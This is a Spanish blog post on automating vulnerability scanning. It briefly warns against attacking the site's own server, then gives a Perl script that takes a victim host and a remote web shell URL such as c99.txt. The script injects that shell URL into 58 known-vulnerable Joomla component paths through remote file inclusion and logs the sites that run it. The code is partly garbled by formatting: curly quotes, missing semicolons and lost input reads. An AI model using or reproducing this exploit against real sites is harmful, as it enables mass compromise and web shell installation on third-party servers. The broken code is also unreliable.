Automatizaciones de vulnerabilidades
|
|
|
|
|
A causa de los cientos de ataques contra MiRuLu, nos hemos vistos obligados a banear a aquellos que hagan sus pruebas contra el servidor de mirulu 48h-72h, las pruebas se hacen en local para testear vuestros proyectos . Hay que aprender a ser más seguros, no aprender a hacer daño.
Estas tools son denominadas script’s por su simple programación. Aunque tenemos dos tipos: aquellas automatizaciones que se encargan de explotar las vulnerabilidades (las cuales se acercan más al termino de exploits), o aquellas que escanean en busca de unos determinados parámetros vulnerables. (En esta última centraremos la entrada de hoy).
Imaginemos que tenemos un CMS en el cual existen varias vulnerabilidades, no creo que la mejor manera fuese ir probando vulnerabilidad a vulnerabilidad a mano.Pues se crea una automatización que compruebe las vulnerabilidades de ese CMS automáticamente.
Las automatizaciones que buscan parámetros vulnerables son simples de programación y aún más para vulnerabilidades . Veamos el ejemplo de una automatización para las vulnerabilidades de Remote File Inclusion en el CMS de Joomla.
#!/usr/bin/perl # RFI Joomla Comp v.1 # Code by JosS # http://www.fullsecure.org use HTTP::Request; use LWP::UserAgent;sub lw -atack { my $SO = $^O; my $linux = “”; if (index(lc($SO),”win”)!=-1{ $linux=”0″; }else{ $linux=”1″; } if($linux){ system(”clear”) } else{ system(”cls”); system (”title RFI Joomla Comp v.1 - By JosS”); system (”color 02″); } } lw; print “tt########################################################\n\n”; print “tt# RFI Joomla Comp .v1 - EspSec #\n\n”; print “tt# by Jose #\n\n”; print “tt########################################################\n\n”; print “Insert host:(ex: http://www.site.com/)\n”; $host=; chomp $host; print “n”; # Si la url no tiene http: al principio if ( $host !~ /^http:/ ) { # lo añadimos $host = ‘http://’ . $host; } # Si la url no tiene / al final if ( $host !~ //$/ ;) { # lo añadimos $host = $host . ‘/’; } print “Insert shell:(ex: http://www.site.com/c99.txt)\n”; $shell=; chomp $shell; print “n”; # Si la url no tiene http: al principio if ( $shell !~ /^http:/ ) { # lo añadimos $shell = ‘http://’ . $shell; } print “Insert string search:(ex: c99shell)n”; $string=; chomp $string; print “nn”; print “Your config:nn”; print ” Victim: $host n”; print ” Url Shell: $shell n”; print ” Search String: $string nn”; print “Scan…nn”; $vuln1=”administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=”; $vuln2=”components/com_lmo/lmo.php?mosConfig_absolute_path=”; $vuln3=”components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=”; $vuln4=”administrator/components/com_webring/admin.webring.docs.php?component_dir=”; $vuln5=”administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=”; $vuln6=”components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=”; $vuln7=”components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=”; $vuln8=”administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=”; $vuln9=”administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=”; $vuln10=”components/com_reporter/reporter.logic.php?mosConfig_absolute_path=”; $vuln11=”administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=”; $vuln12=”components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=”; $vuln13=”components/com_joomlaboard/file_upload.php?sbp=”; $vuln14=”components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=”; $vuln15=”components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=”; $vuln16=”components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=”; $vuln17=”components/com_thopper/inc/request_type.php?mosConfig_absolute_path=”; $vuln18=”components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=”; $vuln19=”components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=”; $vuln20=”components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=”; $vuln21=”components/com_mosmedia/media.tab.php?mosConfig_absolute_path=”; $vuln22=”components/com_mosmedia/media.divs.php?mosConfig_absolute_path=”; $vuln23=”modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=”; $vuln24=”modules/mod_as_category.php?mosConfig_absolute_path=”; $vuln25=”components/com_articles.php?absolute_path=”; $vuln26=”classes/html/com_articles.php?absolute_path=”; $vuln28=”administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=”; $vuln29=”templates/be2004-2/index.php?mosConfig_absolute_path=”; $vuln30=”libraries/pcl/pcltar.php?g_pcltar_lib_dir=”; $vuln31=”administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=”; $vuln32=”administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=”; $vuln33=”administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=”; $vuln34=”components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=”; $vuln35=”administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=”; $vuln36=”administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=” $vuln37=”administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=”; $vuln38=”administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=”; $vuln39=”administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=”; $vuln40=”administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=”; $vuln41=”administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=”; $vuln42=”administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=”; $vuln43=”administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=”; $vuln44=”components/com_mp3_allopass/allopass.php?mosConfig_live_site=”; $vuln45=”components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=”; $vuln46=”administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=” $vuln47=”administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=”; $vuln48=”administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=”; $vuln49=”administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=”; $vuln50=”administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=”; $vuln51=”administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=”; $vuln52=”administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=”; $vuln53=”administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=”; $vuln54=”administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=”; $vuln55=”administrator/components/com_color/admin.color.php?mosConfig_live_site=”; $vuln56=”administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=”; $vuln57=”administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=”; $vuln58=”modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=”; for ($i=1;$i<59;$i++) {{ $cont=vuln.$i; chomp $cont; print “$contn”; $final=$host.$$cont.”$shell?”; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if ($response->is_success) { if( $response->content =~ /$string/){ open(FILE,”>>results.txt”); print FILE “$finaln”; close(FILE); print “————————————————-n”; print “$finaln”; print “IS VULNZ..n”; print “————————————————-n”; }} }